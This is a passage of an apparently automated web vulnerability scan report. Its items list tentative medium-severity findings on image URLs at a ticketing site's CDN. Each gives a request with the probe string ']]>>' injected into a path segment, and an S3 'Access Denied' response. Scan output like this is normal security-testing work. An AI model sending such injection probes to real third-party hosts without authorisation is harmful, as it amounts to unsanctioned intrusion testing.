HTTP/1.0 403 Forbidden
x-amz-request-id: 283833231AF10057
x-amz-id-2: hSTCGb3AAHAUz3kCdy8+C/kIC4jcBpNf6qsU/N3wBKWAJw0Otumo5ZJEa1qtXFrw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 47ccf891364858057fcafd1af9a41e79c70ac6569f501218d0b5461e1d979756420196b8aa19e3ee
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>283833231AF10057</RequestId><HostId>hSTCGb3AAHAUz3kCdy8+C/kIC4jcBpNf6qsU/N3wBKWAJw0Otu
...[SNIP]...

8.42. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3057B3A91E3ED804
x-amz-id-2: AjND7tYPJELAo3mTeKM1n687pYd+e2hpDLWcsT90VRWeMCKxxcfXSgYYqcvQ6D0Y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0173b1f38a2cd1193bfc6f45c4a375e857e2cbd54db7f5cd6b631a10ad1379c9019d2cf2a540150a
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3057B3A91E3ED804</RequestId><HostId>AjND7tYPJELAo3mTeKM1n687pYd+e2hpDLWcsT90VRWeMCKxxc
...[SNIP]...

8.43. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 196C21C4ADADDD46
x-amz-id-2: q0QZG6H7tG5FwdGTRztpMLtnfDTtPdqoN/4Yn3dPExQRPuM3Edf2K2/OE5jb9Xl0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0b5bbdfe6c084cb6d8486dbbc293ee3d17f4a6d0a189674c9571ce2aa0e7df74de79fb80b6d9ef59
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>196C21C4ADADDD46</RequestId><HostId>q0QZG6H7tG5FwdGTRztpMLtnfDTtPdqoN/4Yn3dPExQRPuM3Ed
...[SNIP]...

8.44. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD788207A5CAD577
x-amz-id-2: MkDnwADcGyyE9zNlcxePHZ55DEaywhl1v5ZDROHpNoiPZl7usB24uysNlAkWJoDw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b5f88fdb482c241ec2ecc333b3cd59ea293842f9ac78591d6ab6ed314216b4b91cdc7c06d4652205
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD788207A5CAD577</RequestId><HostId>MkDnwADcGyyE9zNlcxePHZ55DEaywhl1v5ZDROHpNoiPZl7usB
...[SNIP]...

8.45. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6A407F07BC8E3E59
x-amz-id-2: tYD36vA0+KxQ4rnOrfmYiM/qgMgobV/uns77zJ+SI/TFlUu0Qq65pcS5CSiAixlZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4abcd89af2d9be82e90d9a0a9cf0d25ef93d042913782a7a68cf37680264f0def6a285eaae00856b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6A407F07BC8E3E59</RequestId><HostId>tYD36vA0+KxQ4rnOrfmYiM/qgMgobV/uns77zJ+SI/TFlUu0Qq
...[SNIP]...

8.46. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B61F7242BD4FCC7D
x-amz-id-2: uJUN2FTZJM2siAt0wGys6hXm9rIp5rei1XPHOX84/34Xfgk4cHTUHxefOijuMGRA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a15f30fed158ce096f51d9e01ff56893a1ea5ef5da92ff005af4691a8ca06a30453b7ea4f1119e32
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B61F7242BD4FCC7D</RequestId><HostId>uJUN2FTZJM2siAt0wGys6hXm9rIp5rei1XPHOX84/34Xfgk4cH
...[SNIP]...

8.47. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E8DF1B1C3648A49F
x-amz-id-2: vnro/XwL2sEhWE/6AzFTI/PiD6UjA2pqnhMtKBz+PfHGbGVuguK1X6qvsbPT/iJx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c43df31c0c8e190f07a42ae826419f6fef30dbfc134d02f1e964b2390a769db0a3bd7eb11c8302dc
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E8DF1B1C3648A49F</RequestId><HostId>vnro/XwL2sEhWE/6AzFTI/PiD6UjA2pqnhMtKBz+PfHGbGVugu
...[SNIP]...

8.48. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AF468C8D3B685AC4
x-amz-id-2: nsK7DZkrRIA6n19NUwF7HGD7egoPSdWmK8YaWy70P94X96L5OktOluOa8WMUUm40
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 18276d97c22a0e6471491b98b3dedaef743b74018f2c59c58e64c56930e800c0276cc256b5559e4b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AF468C8D3B685AC4</RequestId><HostId>nsK7DZkrRIA6n19NUwF7HGD7egoPSdWmK8YaWy70P94X96L5Ok
...[SNIP]...

8.49. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E6D4DEE6CE627E8
x-amz-id-2: gl7G7lQlRIE28Sh3irJvlrM+bG7xSisMZBLCS+90mWOB4v5GiwWzwxWY78IU7hpi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4edbff9250d504a08d043c86edd0df3c2a1bf6ce7880c2f7084b2c6f4ea37c42c0c6c6231e874d40
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E6D4DEE6CE627E8</RequestId><HostId>gl7G7lQlRIE28Sh3irJvlrM+bG7xSisMZBLCS+90mWOB4v5Giw
...[SNIP]...

8.50. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 655A22BDD32A4CEE
x-amz-id-2: clwTlONbF2TkpxNndY7ovNK3fHnFV9vgqg4nd5tuVJ/ZkhQoIzDaG+9xQFdL0/bg
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 07f8cbd92c16f85f1a0b05b56b2f57e9224145b57cae59372f909b68785cfe932839157c2e07eaab
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>655A22BDD32A4CEE</RequestId><HostId>clwTlONbF2TkpxNndY7ovNK3fHnFV9vgqg4nd5tuVJ/ZkhQoIz
...[SNIP]...

8.51. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0E6432B1CB8BC745
x-amz-id-2: O/7txjJ7tOuzoDXoKhWnL7FHvkB4jAzw7iNxboIQRfP/Ul55fF3cQjZvkzxQAhB9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 76e0b58d49a61b3c2f0a0183f50000a9f503bdd2057fa74626755568d4989b370b7d45c06843e8c8
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0E6432B1CB8BC745</RequestId><HostId>O/7txjJ7tOuzoDXoKhWnL7FHvkB4jAzw7iNxboIQRfP/Ul55fF
...[SNIP]...

8.52. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 88C6B85D02E73D34
x-amz-id-2: Cwr40e6Q7CFz4dRxIfeYBXMRBnAIg/2Vh1c90YReEAYr2kewnlDS2MuRTYp+fpNB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b1c453d4ca92a8393e71999bae5a1ac4402ef6f3923e6a68808f8b6712a0e614d7322825cea70ec
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>88C6B85D02E73D34</RequestId><HostId>Cwr40e6Q7CFz4dRxIfeYBXMRBnAIg/2Vh1c90YReEAYr2kewnl
...[SNIP]...

8.53. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97D2C8F3CF74D0A3
x-amz-id-2: VWGeHInW4LBASBCfkrxC4o35FB9AKP6t5B82IrfOPrA6hH+V205sDUzBLiKlRnFA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60c3f5cc4545c737df9dfab557abd280db7dcbf02fde39b37c995bedc6b79b4964f22aa24110d74b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97D2C8F3CF74D0A3</RequestId><HostId>VWGeHInW4LBASBCfkrxC4o35FB9AKP6t5B82IrfOPrA6hH+V20
...[SNIP]...

8.54. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E64A2EF17ED7F8F7
x-amz-id-2: uLaa7J1JVXJ4VCKjHmLFRsd3yRkVvUQiUR/j/vmd8gqykDDhaGkH9L/NqcK8E1tJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 426a7c8ad8f6fafc431df70eb9927f845c5f3b9207e8517a7b21ea3a8534855f1d3aa67abb128e9e
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E64A2EF17ED7F8F7</RequestId><HostId>uLaa7J1JVXJ4VCKjHmLFRsd3yRkVvUQiUR/j/vmd8gqykDDhaG
...[SNIP]...

8.55. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2F608FA35C9E3501
x-amz-id-2: Dbr0Dxl0mdtsdtLsB7V+EJJkzoVnruAFSKDPQJEZKQqpsaUEQt/GIjHVXPD/mbys
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e6cafe12d267df7b33fed43d9d04bdff6d55b04a00070ca74f620b1ee2749155c3199dbbb6fe806d
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2F608FA35C9E3501</RequestId><HostId>Dbr0Dxl0mdtsdtLsB7V+EJJkzoVnruAFSKDPQJEZKQqpsaUEQt
...[SNIP]...

8.56. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 68D659726C9F9AA2
